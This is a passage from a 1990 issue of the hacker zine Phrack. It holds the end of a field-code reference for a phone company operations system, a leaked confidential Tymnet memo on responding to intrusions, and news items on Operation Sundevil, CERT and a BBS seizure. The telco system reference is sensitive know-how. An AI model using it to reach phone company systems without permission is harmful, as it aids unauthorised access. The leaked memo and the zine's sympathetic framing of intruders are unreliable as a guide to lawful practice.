  2285.      XXX=Maximum of 3 Alphanumeric Characters
  2286. TYP  Switching Type
  2287.      TYP XXX
  2288.      1ES=Number 1ESS
  2289.      2ES=Number 2ESS
  2290.      3ES=Number 3ESS
  2291.      5ES=Number 5ESS
  2292.      RSS=Remote Switching System
  2293.      1XB=Number 1 Cross-bar
  2294.      5XB=Number 5 Cross-bar
  2295.      SXS=Step-by-step
  2296.      DMX=DMS-10
  2297.      DMC=DMS-100
  2298. US   USOC
  2299.      US XXXXX
  2300.      XXXXX=Maximum of 5 Alphanumeric Characters
  2301. USE  Entity Usage
  2302.      USE X
  2303.      G=Growth
  2304.      S=Stable
  2305. VAL  Minimum Valid Hours for Entity Data
  2306.      VAL XX
  2307.      XX=1-99
  2308. WC   Wire Center
  2309.      WC XX
  2310.      XX=Alphanumeric
  2311. WL   Work Location
  2312.      WL Y
  2313.      Y=1-8    or
  2314.      WL XXX
  2315.      ADM=Administrative
  2316.      ACT=Assignment Change Ticket
  2317.      CPC=Special Service Circuits
  2318.      MCT=Maintenance Change Tickets
  2319. WPN  Work Package Number
  2320.      WPN XXXX
  2321.      XXXX=1-9999
  2322. WPT  Work Package Type
  2323.      WPT XXX
  2324.      XXX=Maximum of 3 Alphanumeric Characters
  2325. XN   "X" Number
  2326.      XN XXX-YYXX  or
  2327.      XN XXX-YXX
  2328.      X=Numeric
  2329.      Y=Alphanumeric
  2330. ZN   Zone Location
  2331.      ZN XXX
  2332.      XXX=001-999
  2333. =============================================================================
  2334. ACKNOWLEDGEMENTS
  2335. Skinny Puppy for refreshing my memory
  2336. The Urvile for the "$*" file and further usage of echo
  2337. Bell Laboratories OPA-1Y600-01
  2338.  
  2339. _______________________________________________________________________________
  2340.                                  ==Phrack Inc.==
  2341.                   Volume Three, Issue Thirty-one, Phile #7 of 10
  2342.                               COMPANY CONFIDENTIAL
  2343.                                INTERIM MEMORANDUM
  2344.  
  2345.               SUBJECT:  TYMNET SUPPORT FOR CUSTOMER'S DATA SECURITY
  2346.        PURPOSE:  This document provides background, and general procedures
  2347.        and practices used to support customers with suspected security
  2348.        problems.  Field Sales is the intended audience but is a general
  2349.        document and may be useful to other customer support personnel.
  2350.        Currently, this document is in a final review.  Meanwhile, it is to
  2351.        retain the status of an internal proprietary document.
  2352.        BACKGROUND:  BT Tymnet Inc, and its Network Systems Company,
  2353.        believe information integrity is vital to ourselves and our
  2354.        customers.  One way TYMNET insures integrity is by providing good
  2355.        security.  TYMNET has a baseline security of user name, password,
  2356.        and user access profile available for all customers.  Further, there
  2357.        are two security products.  One permits the customer to limit
  2358.        password life (password automatically expires after a customer
  2359.        elected time period) and the other permits the end user to change
  2360.        his/her own password.  Since we do consider security a key issue,
  2361.        we continue to develop other security features.  Also, we work with
  2362.        Security vendors to certify their security products on our network,
  2363.        thus permitting customers to add such products, should they so
  2364.        desire.
  2365.        We have established Network Systems Company Policies which provide
  2366.        a framework for the information contained herein (see NSC Policy
  2367.        121 and 122.  More policies are in distribution as of this
  2368.        writing).  It is highly recommended that these policies be reviewed
  2369.        since they represent the framework of this document.
  2370.        Legal considerations are another key issue in any security case.
  2371.        Support, other then providing the customer with related security
  2372.        data, can only occur if law(s) have been broken.  The
  2373.        legal issues are complex and only a minimal information is
  2374.        provided herein.  At at the heart of this issue is the fact that
  2375.        the customer is the injured party, not TYMNET.  Patience and good
  2376.        communication may be required to get the customer to understand
  2377.        this fact.  The customers must act for themselves to obtain
  2378.        law enforcement support.  TYMNET will support that activity, and
  2379.        help to the degree possible, much as a "friend of the court".
  2380.        THE SUPPORT:  We provide security support as a responsible
  2381.        network service provider.  The first step in that support is for
  2382.        the field sales representative to act as a security consultant to
  2383.        the customer, at least to the extent explained below.
  2384.        The customer is well advised to plan in advance "what to do
  2385.        when Captain Midnight strikes" -- contingency planning, pure
  2386.        simple.  First there are two basic alternatives to choose from:
  2387.                               PROTECT AND PROCEED
  2388.                                        OR
  2389.                               PURSUE AND PROSECUTE
  2390.        "Protect and proceed" means 1) determine how the incident
  2391.        occurred, 2) plug the security leak/hole, and 3) go on with
  2392.        business as normal.
  2393.        (Do we want written notification of the Intent to "Pusue and
  2394.        Prosecute" from the "Injured Party?").
  2395.        "Pursue and prosecute" is just that.  The first step is having
  2396.        the customer obtain legal support, and both we and the customer
  2397.        continue to gather evidence until the suspect is apprehended.  The
  2398.        next step is the prosecution in a court of law.  (The final step is
  2399.        to return to the first alternative, e.g., now protect and
  2400.        proceed.)
  2401.        The customer needs to judge each case  on its own merits, but
  2402.        generally the first choice is the wiser one.  The second choice
  2403.        involves considerable effort, mostly by the customer and law
  2404.        enforcement agency(s), possible negative publicity for the
  2405.        customer and does not necessarily result in successful prosecution.
  2406.        Good contingency planning also includes becoming familiar with the
  2407.        laws and the local law enforcement people.
  2408.        The starting point is a suspected incident.  Herein, we will address
  2409.        the case where the customer has identified a suspected intruder.
  2410.        Generally, that occurs by a customer's detailed review of billing
  2411.        or host based security exception reports.
  2412.        At this point it is essential the field sales representative open a
  2413.        ticket containing at least the following:  1) customer name and CID,
  2414.        2) host(s) involved, 3) incident start and stop times, and 4) the
  2415.        customer's objective.  Add any other information deemed helpful.
  2416.        Other support may be an on-line trace of the call, if the
  2417.        suspect is currently on-line.  Field support should do this trace, or
  2418.        alternately, this same help can be obtained by calling network
  2419.        customer support and/or NetCon.  In any case it must be done while
  2420.        the suspect is on-line.  Such trace information should be
  2421.        included on the ticket.
  2422.        Based on the customer's position; the case will fit either
  2423.        "prevent and proceed" or, "pursue and prosecute".  The former is
  2424.        straight forward, in that TYMNET security will research the
  2425.        incidents(s), and provide data (generally user name and point of
  2426.        origin(s) to the customer via Field Sales, with recommendations
  2427.        on how to prevent any further occurrence.  We do provide this
  2428.        service as a responsible vendor, although strict interpretation
  2429.        of NSC policy 121 precludes it.  However, we do apply the policy if
  2430.        a customer continues to ask for data without taking preventative
  2431.        action.
  2432.        The "pursue and prosecute" case is complex, and is different for each
  2433.        situation.  It will be explained by using a typical scenario.  After
  2434.        the first step (as above), it is necessary to gather data sufficient
  2435.        to show a pattern of intrusion from a single TYMNET access point.
  2436.        With this information, the customer (the injured party) must contacts
  2437.        law enforcement agency(s), with the one exception noted below.
  2438.        If that intrusion point is through a gateway from a foreign
  2439.        country, for all practical purposes, the customer can do little to
  2440.        prosecute.  The law(s) of the foreign country will apply since
  2441.        extradition is most unlikely.  Therefore, action will have to be
  2442.        have to be initiated by the network service provider in the
  2443.        foreign country.  In this case, TYMNET security will have MIS
  2444.        research the session details to obtain the Network User
  2445.        Identifier, and External Network Support (Jeff Oliveto's
  2446.        organization) will communicate that information to the foreign
  2447.        network for their action (cases involving U.S. government computers
  2448.        may get special treatment - see for example - Communications of the
  2449.        ACM, May, 1988, article on "Stalking the Wiley Hacker").
  2450.        Most all security incidents on our network are caused by international
  2451.        hackers using X.121 addressing.  Frequently, our customer is unaware
  2452.        of the risk of X.121 addressing, and permits it.  BE SURE YOUR
  2453.        CUSTOMERS KNOW THAT THEY CAN CHOOSE FULL TYMNET SECURITY FEATURES,
  2454.        THEREBY PRECLUDING SUCH INTRUSIONS FROM X.121 ADDRESSING FROM
  2455.        FOREIGN NETWORKS.
  2456.        For the domestic case, the customer gets law enforcement (attorney
  2457.        general at incoming call location, secret service if credit card
  2458.        fraud is involved, or possibly the FBI, depending on the incident)
  2459.        to open a case.  Note, damage in estimated dollars is usually
  2460.        necessary to open a case, and many agencies will not take action on
  2461.        small claims.  For example, as of December, 1988, the Los Angeles
  2462.        Attorney will not open a case for less than $10,000 (they have too
  2463.        big a caseload at higher damages).
  2464.        Assuming legal support is provided, a court order for a wire tap
  2465.        and trace will be obtained, thereby determining the caller's phone
  2466.        number (this step can be very involved and time consuming for long
  2467.        distance calls).  The next legal action occurs after the calling
  2468.        number is identified.  A search warrant is obtained for searching the
  2469.        facility housing the phone location.  Normally, this search will
  2470.        gather evidence sufficient for prosecution.  Evidence is typically
  2471.        the necessary terminal equipment, printouts, diskettes, etc.  Then,
  2472.        at long last the prosecution.  Also note, again at the time the
  2473.        calling number is identified, the injured party should use the
  2474.        "protect and proceed" plan.
  2475.        For further information, contact Data Security, TYMNET Validations,
  2476.        or Ontyme NSC.SECURITY.
  2477.  
  2478. _______________________________________________________________________________
  2479.                               ==Phrack Inc.==
  2480.                Volume Three, Issue Thirty-one, Phile #8 or 10
  2481.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2482.             PWN              Phrack World News              PWN
  2483.             PWN             Issue XXXI, Part One            PWN
  2484.             PWN         Compiled by Phreak_Accident         PWN
  2485.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2486.  
  2487.  
  2488. Operation "Sun-Devil"
  2489. =====================
  2490.      May 9th and 10th brought on two day thats would be marked in every hackers
  2491. history book.  The reason we assume these days will be important to many, is
  2492. that maybe it's time we opened are eyes and saw the witch hunt currently in
  2493. progress.
  2494.      In less than 48 hours, 150 Secret Service men and other law officials
  2495. served 30 search warrents in 14 cities around the nation (This thing was hudge).
  2496.      Operation "Sun-Devil" (As the Attorney General in Phoenix called it), was
  2497. a success on their part. "The investigation though is not over,  and there are
  2498. more warrents to be executed.", said Jim Folwer of L.A's Secret Service.
  2499.      Any details of the investigation are not being given out at this time.
  2500. The Asst. Attorney General of Pheonix told Phrack Inc. that there were other
  2501. problems involving the investigation and that it was an ongoing investigation
  2502. for the last TWO years.
  2503.      It is my understanding that Gail Thackeray and the Secret Service are not,
  2504. taking this lightly.  She told Phrack inc. that they are not distinquishing
  2505. pirates, hackers, or phreakers.  Basically, it's any kid with a modem that calls
  2506. a BBS with an alias.  Yes, we are the witches, and we are being
  2507. hunted.
  2508.      The following are Two news releases obtianed via fax through the U.S.
  2509. Secret Service for Phrack Inc.
  2510.  
  2511.                   N E W S     R E L E A S E
  2512. FOR IMMEDIATE RELEASE             CONTACT:  Gail Thackeray
  2513. ------------------------          Assitant Attorney General
  2514. May 9, 1990 @ 11:00 A.M.          (602) 542-4266
  2515.  
  2516.      Attorney General Bob Corbin announced today that in
  2517. connection with an eighteen-month joint investigation into
  2518. computer crime conducted with the United States Secret
  2519. Service and the United States Attorney's office, the Arizona
  2520. Attorney General's office has executed seven search warrants
  2521. in which computers, electronic bulletin boards, telephone
  2522. test equipment and records have been seized.
  2523.      The Organized Crime and Racketeering Division
  2524. investigation involved complaints by Arizona and out of state
  2525. victims of substantial financial losses resulting from credit
  2526. card fraud and theft of long distance telephone and data
  2527. communications services, and by victims of attacks on
  2528. computer systems operated by government agencies, private
  2529. corporations, telephone companies, financial institutions,
  2530. credit bureaus, and a hospital.
  2531.      The Arizona Attorney General's office received
  2532. information and technical assistance from the Glendale,
  2533. Arizona Police Department's Computer Crime Unit, and from
  2534. many private sector sources, including Bellcore (Bell
  2535. Communications Research), American Express, Communications
  2536. carriers U.S. Sprint, AT&T, MCI, Com Systems, MidAmerican
  2537. Communications, LDL Communications, and Shared Use Network.
  2538. Without the cooperation of these companies and of numerous
  2539. federal, state and local law enforcement agencies around the
  2540. country, this investigation would have been impossible.
  2541.      The privacy of our citizens and the health of our
  2542. economy depend upon secure, reliable computer systems.
  2543. Computer fraud and attempts to compromise senstitive public
  2544. and private computer systems will not be tolerated.
  2545. Individuals who commit these offenses in Arizona can expect
  2546. to be prosecuted.
  2547.  
  2548. .end.
  2549.                  P R E S S     R E L E A S E
  2550. FOR IMMEDIATE RELEASE        Contact:  Wendy Harnagel
  2551. Wednesday, May 9, 1990       United States Attorney's Office
  2552. ----------------------       (602) 379-3011
  2553.      PHOENIX -- Stephen M. McNamee, United States Attorney
  2554. District of Arizona, Robert K. Corbin, Attorney General for
  2555. the State of Arizona, and Henry R. Potosky, Acting Special
  2556. Agent in Charge of the United States Secret Service Office in
  2557. Phoenix, today announced that approximately twenty-seven
  2558. search warrants were executed on Monday and Tuesday, May 7
  2559. and 8, 1990, in various cities across the nation by 150
  2560. Secret Service agents along with state and local law
  2561. enforcement officials.  The warrants were issued as a part of
  2562. Operation Sundevil, which was a two year investigation into
  2563. alleged illegal computer hacking activities.
  2564.      The United States Secret Service, in cooperation with
  2565. the United States Attorney's Office, and the Attorney General
  2566. for the State of Arizona, established an operation utilizing
  2567. sophisticated investigative techniques, targeting computer
  2568. hackers who were alleged to have trafficked in and abuse
  2569. stolen credit card numbers, unauthorized long distance
  2570. dialing codes, and who conduct unauthorized access and damage
  2571. to computers.  While the total amount of losses cannot be
  2572. calculated at this time, it is estimated that the losses may
  2573. run into the millions of dollars.  For example, the
  2574. unauthorized accessing of long distance telephone credit
  2575. cards have resulted in uncollectible charges.  The same is
  2576. true of the use of stolen credit card numbers.  Individuals
  2577. are able to utilize the charge accounts to purchase items for
  2578. which no payment is made.
  2579.      Federal search warrants were executed in the following
  2580. cities:
  2581.  
  2582.      Chicago, IL
  2583.      Cincinatti, OH
  2584.      Detroit, MI
  2585.      Los Angeles, CA
  2586.      Miami, FL
  2587.      Newark, NJ
  2588.      New York, NY
  2589.      Phoenix, AZ
  2590.      Pittsburgh, PA
  2591.      Plano, TX
  2592.      Richmond, VA
  2593.      San Diego, CA
  2594.      San Jose, CA
  2595.      Unlawful computer hacking imperils the health and
  2596. welfare of individuals, corporations and government agencies
  2597. in the United States who rely on computers and telephones to
  2598. communicate.
  2599.      Technical and expert assistance was provided to the
  2600. United States Secret Service by telecommunication companies
  2601. including Pac Bel, AT&T, Bellcore, Bell South, MCI, U.S.
  2602. Sprint, Mid-American, Southwestern Bell, NYNEX, U.S. West,
  2603. and by the many corporate victims.  All are to be commended
  2604. for their efforts for their efforts in researching intrusions
  2605. and documenting losses.
  2606.      McNamee and Corbin expressed concern that the improper
  2607. and alleged illegal use of computers may become the White
  2608. Collar crime of the 1990's.  McNamee and Corbin reiterated
  2609. that the state and federal government will vigorously pursue
  2610. criminal violations of statutes under their jurisdiction.
  2611. Three individuals were arrested yesterday in other
  2612. jurisdictions on collateral or independent state charges.
  2613. The investigations surrounding the activities of Operation
  2614. Sundevil are continuing.
  2615.      The investigations are being conducted by agents of the
  2616. United States Secret Service and Assistant United States
  2617. Attoryney Tim Holtzen, District of Arizona, and Assistant
  2618. Arizona Attorney General Gail Thackery.
  2619.  
  2620. .end.
  2621. _______________________________________________________________________________
  2622. Virus mania
  2623. ===========
  2624.      Robert T. Morris started it all.  Who cares, it's over and done with.
  2625. Never the less, it's being dragged out in every national paper.  It's old news
  2626. so we won't cover it here, but we will tell you about something the Army has up
  2627. its sleeve.
  2628.                     Army is Looking for a Few Good Viruses
  2629.                              By Rory J. O'conner
  2630.                            Knight-Ridder Newspapers
  2631.                     ______________________________________
  2632.      The U.S. Army is looking for help to develop the seeds of a new-age germ
  2633. warfare: It wants business to help it turn computer "viruses" into military
  2634. weapons.
  2635.      Experts predict the viruses, if sucessfully developed, could be used to
  2636. wreak havoc on the increasing number of computers in the battlefield.  The
  2637. destructive computer programs which have increasingly damaged commercial and
  2638. research computer systems in the past four years, could be used to disrupt
  2639. military communications and feed misleading data to enemy commanders.
  2640.      The viruses could aslo be used to alter the programming of crucial
  2641. communications satellites serving combat units, the experts said.
  2642.      The Army is soliciting bids from small businesses to determine the
  2643. feasibility of using computer viruses in warefare.  And it is willing to pay up
  2644. to $550,000 to a company that comes up with a plan for creating the programs -
  2645. and figures out how to use military radio systems to introduce them into enemy
  2646. computers.
  2647.      A computer virus is a kind of program designed to disrupt normal operation
  2648. of a computer system or damage data ont hat system by altering or destroying
  2649. it.  The rogue programs are most effective when introduced secretly into the
  2650. computer system of an unsuspecting user and when their damage is subtle or
  2651. hidden fromt he user for some time.
  2652.      Viruses are also self-duplicating and can spread undetected from an
  2653. infected computer to other computer systems they contact.
  2654.      So far, more than 60 computer viruses have been identified, most of them
  2655. attacking poorly guarded personal computers used by businesses, universities
  2656. and inividuals.  The Army's virus would have to be more sophisticated than
  2657. those programs.
  2658.      But some detractors of the concept say the Army could wind up with the
  2659. same problem it has with biological weapons:  Creating destructive elements
  2660. that might get loose and cause widespread damage to its own forces as well as
  2661. civilians.
  2662.      "This stuff is very dangerous, and most people involved in creating
  2663. viruses are not aware of the threat," said a Bay Area virus expert who asked ot
  2664. to be named.  "You can't spread anthrax around the world and not have it come
  2665. back around to you.  And the enemy is using the same kind of computers and
  2666. software that we are."
  2667.       Many experts who are fighting the explosion in virus activity by amateur
  2668. programmers are especially angry at government efforts to develop the programs
  2669. for the military.  Some say it is particulary troubling in light of the
  2670. sentencing of Robert T. Morris Jr. (Ed -Ick), convicted in federal court of
  2671. sending a similar program through a government sponsored network in 1988.
  2672.       "It bothers me that the government says in one breath (viruses) are bad
  2673. and illegal and then asks for someone to develop them," said Glenn Tenney, a
  2674. San Mateco, Calif., programmer and organizer of the annual Computer Hackers
  2675. Conference.  "If Morris had done the same thing for the Army, they'd have paid
  2676. him hundreds of thousands to do it.  But he did it on the wrong side and got
  2677. punished."
  2678.        Computer experts say creating a virus to the Army's specifications is
  2679. possible with current technology - although some of the Army's requirements
  2680. could make developing it more difficult than creating an ordinary personal
  2681. computer virus.
  2682.        First, military computer systems are usually designed with far more
  2683. security features than commercial systems, making it much harder for a virus to
  2684. enter the systems.  Second, the Army is emphasizings the use of radio
  2685. communication to inject the virus into enemy systems.  Normally, computer
  2686. viruses spread through the exchange of floppy disks that contain the rogue
  2687. program or along wires connecting several computers.  Using complex military
  2688. radio signals instead would require expertise that mose programmers don't have.
  2689. .end
  2690. _______________________________________________________________________________
  2691. RIPCO    May 8th, 1990
  2692. -----    -------------
  2693.      Operation Sun-Devil claimed more than just a few "Codelords" around the
  2694. states, it claimed one of the oldest and more popular boards.  Nobody knows
  2695. when or if RIPCO shall return.
  2696.      Reportedly, Dr. Ripco was charge on a hand-gun violation after his house
  2697. was searched.  Phrack inc. can't comment on this.
  2698.      The following is the exact transcript of the message left on RIPCO's
  2699. answering maching after Operation Sun-Devil.
  2700. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2701. This is 528-5020.
  2702. As you are probably aware, on May 8, the Secret Service conducted a series
  2703. of raids across the country.  Early news reports indicate these raids
  2704. involved people and computers that could be connected with credit card and
  2705. long distance toll fraud. Although no arrests or charges were made, Ripco
  2706. BBS was confiscated on that morning.  It's involvement at this time is
  2707. unknown. Since it is unlikely that the system will ever return, I'd just l
  2708. say goodbye, and thanks for your support for the last six and a half years.
  2709. It's been interesting, to say the least.
  2710. Talk to ya later.
  2711.   {Dr. Ricpo}
  2712.                        *** END OF VOICE MESSAGE ***
  2713. _______________________________________________________________________________
  2714.  
  2715.                                ==Phrack Inc.==
  2716.                  Volume Three, Issue Thirty-one, Phile #9 of 10
  2717.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2718.               PWN             Phrack World News               PWN
  2719.               PWN            Issue XXXI, Part Two             PWN
  2720.               PWN        Compiled by Phreak_Accident          PWN
  2721.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2722.  
  2723.  
  2724. {C}omputer {E}mergency {R}esponse {T}eam
  2725. ----------------------------------------
  2726.      Some call it "Internet Police" -- Others call it "just stupid."
  2727. CERT however is a mix.  But I do give them credit -- After all, have your
  2728. number one goal being 'making the Internet more secure' has to be a tough task.
  2729. Therefore, we give them credit.
  2730.      However, CERT is funded by DARPA, which is a government agency.  And
  2731. anything in my book that the government runs is bad news.  Yes, the government
  2732. pays the 6 man salary and keep their hot-line active 24 hours a day.
  2733.      Ahh..  What do you know about CERT?  "Nothing" you say?  Well, the
  2734. following is the press release and other reprints of information about CERT.
  2735. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2736.  
  2737. Richard Pethia <rdp@SEI.CMU.EDU>
  2738. DEAR XXXXXXXXX,
  2739. I have been reviewing our correspondence files and have discovered
  2740. that your request for information may not have been filled.  I
  2741. apologize for the delay and hope that the information is still useful
  2742. to you.  If, after reading the following, you have additional
  2743. questions or would like to subscribe to one of our information lists,
  2744. please send email with your question/request.
  2745. The Computer Emergency Response Team (CERT) was established by the Defense
  2746. Advanced Research Projects Agency in November of 1988 to serve members
  2747. of the Internet Research community.  The press release below describes
  2748. the general role of the CERT.
  2749. More specifically, the CERT supports individual Internet sites by:
  2750.  -Working with site personnel to help resolve individual computer security
  2751.   incidents.  Contact potentially affected sites to warn them of
  2752.   possible security breaches.  Work with sites to change the
  2753.   conditions that allowed incidents to occur.
  2754.  -Issuing advisories that alert the community to specific system
  2755.   vulnerabilities or intrusion techniques, as well as the methods to
  2756.   protect against them.
  2757.  -Working with the community and system (primarily Unix) vendors to
  2758.   reslove specific system vulnerabilities.
  2759.  -Maintaining and operating moderated mailing lists that: (1) provide a
  2760.   discussion forum for tools and techniques to improve the security of
  2761.   Unix systems, and (2) provide a discussion forum and alert mechanism
  2762.   for PC viruses, trojan horses, etc.
  2763. Over the past year we have developed hundreds of working relationships
  2764. with members of the Internet and other communities and have
  2765. established an extensive information collection and dissemination
  2766. network.  Because of this network of cooperating individuals and
  2767. organizations, we are often able to advise the community of problems
  2768. allowing them to take corrective action before being affeceted by
  2769. those problems.
  2770. ---------------------
  2771.                                                 No.  597-88
  2772.                                                 (202) 695-0192 (Info.)
  2773.                                                 (202) 697-3189 (Copies)
  2774. IMMEDIATE RELEASE       December 6, 1988        (202) 697-5737
  2775. (Public/Industry)
  2776.         DARPA ESTABLISHES COMPUTER EMERGENCY RESPONSE TEAM
  2777. The Defense Advanced Research Projects Agency (DARPA) announced today
  2778. that it has established a Computer Emergency Response Team (CERT) to
  2779. address computer security concerns of research users of the Internet,
  2780. which includes ARPANET.  The Coordination Center for the CERT is
  2781. located at the Software Engineering Institute (SEI), Carnegie Mellon
  2782. University, Pittsburgh, PA.
  2783. In providing direct service to the Internet community, the CERT will
  2784. focus on the special needs of the research community and serve as a
  2785. prototype for similar operations in other computer communities.  The
  2786. National Computer Security Center and the National Institute of
  2787. Standards and Technology will have a leading role in coordinating the
  2788. creation of these emergency response activities.
  2789. The CERT is intended to respond to computer security threats such as
  2790. the recent self-replicating computer program ("computer virus") that
  2791. invaded many defense and research computers.
  2792. The CERT will assist the research network communities in responding to
  2793. emergency situations.  It will have the capability to rapidly
  2794. establish communications with experts working to solve the problems,
  2795. with the affected computer users and with government authorities as
  2796. appropriate.  Specific responses will be taken in accordance with
  2797. DARPA policies.
  2798. It will also serve as a focal point for the research community for
  2799. identification and repair of security vulnerabilities, informal
  2800. assessment of existing systems in the research community, improvement
  2801. to emergency response capability, and user security awareness.  An
  2802. important element of this function is the development of a network of
  2803. key points of contact, including technical experts, site managers,
  2804. government action officers, industry contacts, executive level
  2805. decision-makers and investigative agencies, where appropriate.
  2806. Because of the many network, computer, and systems architectures and
  2807. their associated vulnerabilities, no single organization can be
  2808. expected to maintain an in-house expertise to respond on its own to
  2809. computer security threats, particularly those that arise in the
  2810. research community.  As with biological viruses, the solutions must
  2811. come from an organized community response of experts.  The role of the
  2812. CERT Coordination Center at the SEI is to provide the supporting
  2813. mechanisms and to coordinate the activities of experts in DARPA and
  2814. associated communities.
  2815. The SEI has close ties to the Department of Defense, to defense and
  2816. commercial industry, and to the research community.  These ties place
  2817. the SEI in a unique position to provide coordination support to the
  2818. software experts in research laboratories and in industry who will be
  2819. responding in emergencies and to the communities of potentially
  2820. affected users.
  2821. The SEI is a federally-funded research and development center,
  2822. operating under DARPA sponsorship with the Air Force Systems Command
  2823. (Electronic Systems Division) serving as executive agent.  Its goal is
  2824. to accelerate the transition of software technology to defense
  2825. systems.  Computer security is primarily a software problem, and the
  2826. presence of CERT at the SEI will enhance the technology transfer
  2827. mission of the SEI in security-related areas.
  2828.                                         -END-
  2829.  
  2830. QUESTIONS AND ANSWERS:  DARPA ESTABLISHES CERT, 12/6/88
  2831. Q: Can you provide background on earlier break-ins?
  2832. A: On November 2, 1988, thousands of computers connected to
  2833. unclassified DoD computer networks were attacked by a virus.  Although
  2834. the virus did not damage or compromise data, it did have the effect of
  2835. denying service to thousands of computer users.  The computer science
  2836. research community associated with the Defense Advanced Research
  2837. Projects Agency (DARPA), along with many other research laboratories
  2838. and military sites that use these networks, quickly responded to this
  2839. threat.  They developed mechanisms to eliminate the infection, to
  2840. block the spread of the self-replicating program, and to immunize
  2841. against further attack by similar viruses.  Software experts from the
  2842. University of California at Berkeley, with important contributions
  2843. from the Massachusetts Institute of Technology and other network
  2844. sites, rapidly analyzed the virus and developed immunization
  2845. techniques.  These same software experts also provided important
  2846. assistance in the more recent Internet intrusion of 27-28 November.
  2847. As the events unfolded, DARPA established an ad hoc operation center
  2848. to help coordinate the activities of software experts working around
  2849. the clock and to provide information to appropriate government
  2850. officials.  The operations center had three main tasks.  It
  2851. facilitated communications among the many groups affected, it ensured
  2852. that government organizations were promptly informed of developments,
  2853. and it provided initial technical analysis in DoD.  Although the
  2854. threat was contained quickly, a more maliciously designed virus could
  2855. have done serious damage.
  2856. The recent events serve as a warning that our necessarily increasing
  2857. reliance on computers and networks, while providing important new
  2858. capabilities, also creates new kinds of vulnerabilities.  The
  2859. Department of Defense considers this an important national issue that
  2860. is of major concern in both the defense and commercial sectors.  The
  2861. DoD is developing a technology and policy response that will help
  2862. reduce risk and provide an emergency reaction response.
  2863. Q: Who will be on the CERT?
  2864. A: The CERT will be a team of over 100 experts located throughout the
  2865. U.S.  whose expertise and knowledge will be called upon when needed.
  2866. When not being called upon, they will continue their normal daily
  2867. work.  As noted in the release, these experts will include: technical
  2868. experts, site managers, government action officers, industry contacts,
  2869. executive-level decision-makers and representatives from investigative
  2870. agencies.
  2871. recommendations that will be acted upon by DoD authorities.
  2872. Q: Is the CERT fully operational now?
  2873. A: We are in the very early stages of gathering people for the CERT.
  2874. We are first concentrating on collecting technical experts.  A staff
  2875. is in place at SEI, but details are still being worked out.
  2876. Q: Will there just be one CERT?
  2877. A: The intent is that each major computer community may decide to
  2878. establish its own CERT.  Each CERT will therefore serve only a
  2879. particular community and have a particular technical expertise.  (The
  2880. DARPA/SEI CERT will serve, for example, the research community and
  2881. have expertise in Berkeley-derived UNIX systems and other systems as
  2882. appropriate.)  The National Computer Security Center and the National
  2883. Institute of Standards and Technology will support the establishment
  2884. of the CERTs and coordinate among them.
  2885. Q: What are the special needs of the research community that their
  2886. CERT will serve?
  2887. A: The special challenge of the research community is improving the
  2888. level of computer security without inhibiting the innovation of
  2889. computer technology.  In addition, as is often DARPA's role, their
  2890. CERT will serve as a prototype to explore the CERT concept so that
  2891. other groups can learn and establish their own.
  2892. Q: Does the CERT Coordination Center have a press point of contact?
  2893. A: No.  Their function is to serve as a nerve center for the user
  2894. community.
  2895. .end
  2896. _______________________________________________________________________________
  2897. USA Today and the devil
  2898. -----------------------
  2899.      Many controversies have been made of the article printed in USA Today
  2900. after Operation Sun-Devil took it's toll.
  2901.      Phrack inc. tried to contact the author, and with no luck she wasn't
  2902. accepting phone calls.  Please remember, this is only a USA Today article --
  2903. C'mon, get real USAT.
  2904. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2905.  
  2906.  
  2907. byline 'Debbie Howlett, USA Today' reads:
  2908. A network of computer hackers operating in 14 cities -- which bilked phone
  2909. companies of $50 million -- has been unplugged, police say.
  2910. "We're not talking about somebody who played Space Invaders too many
  2911. times," says Tim Holtzen, spokesman for the U.S. attorney in Phoenix.
  2912. The hackers -- the largest such ring discovered in the USA --broke into
  2913. phone company and bank computer systems to obtain account numbers and run
  2914. up an unknown total in debts, police say.
  2915. "The main thing is the life-threatening information these computer hackers
  2916. were trying to get into," says Richard Adams of the Secret Service.  "It
  2917. goes beyond being monetary to totally mischievous."
  2918. The ring was uncovered 18 months ago, when members tried and failed to
  2919. infiltrate computers at Barrows Neurological Institute in Phoenix.
  2920. They later tried to block incoming calls to the 911 emergency service in
  2921. Chicago.  The motivation?  "The primary reason is as kind of a malicious
  2922. hobby." says Gary Chapman of Computer Professionals for Social
  2923. Responsibility.  "People are interested in testing their skills against
  2924. security measures." But, Adams says, "I hate to minimize it by saying it
  2925. was just for kicks."
  2926. Police seized 40 computers and 23,000 disks during searches Tuesday in 14
  2927. cities, officials said Wednesday.  Five men, between the ages of 19 and 24,
  2928. have been arrested.
  2929. What's been uncovered so far, says Holtzen, may be "just the tip of the
  2930. iceberg."
  2931.                               [END OF STORY]
  2932. _______________________________________________________________________________
  2933.  
  2934.                               ==Phrack Inc.==
  2935.                Volume Three, Issue Thirty-one, Phile #10 of 10
  2936.              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2937.              PWN             Phrack World News               PWN
  2938.              PWN           Issue XXXI, Part Three            PWN
  2939.              PWN        Compiled by Phreak_Accident          PWN
  2940.              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2941.  
  2942. Comp.dcom.telecom
  2943. -----------------
  2944.      The following is excerpts from comp.dcom.telecom regard the now "Infamous"
  2945. Legion Of Doom busts.  I know most of you have seen some of these
  2946. somewhere-sometime, but I thought I would try to get these out for those
  2947. unfortunate souls that don't have Usenet access.
  2948.      I know there have been many controversies over the following material and
  2949. the busts as a whole -- Henceforth, Phrack Inc. will not comment on any of such
  2950. busts.  Mainly because we don't want to jeopardize any current investigations
  2951. concerning LOD and others.  Leave it alone.  It's old news.  Let this sum it up
  2952. for you guys and then forget about it.
  2953. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2954.  
  2955. Newsgroups: comp.dcom.telecom
  2956. Subject: CBS News Special Report - "The Busting of The Mentor"
  2957. Message-ID: <4747@accuvax.nwu.edu>
  2958. Date: 5 Mar 90 06:11:49 GMT
  2959. Sender: news@accuvax.nwu.edu
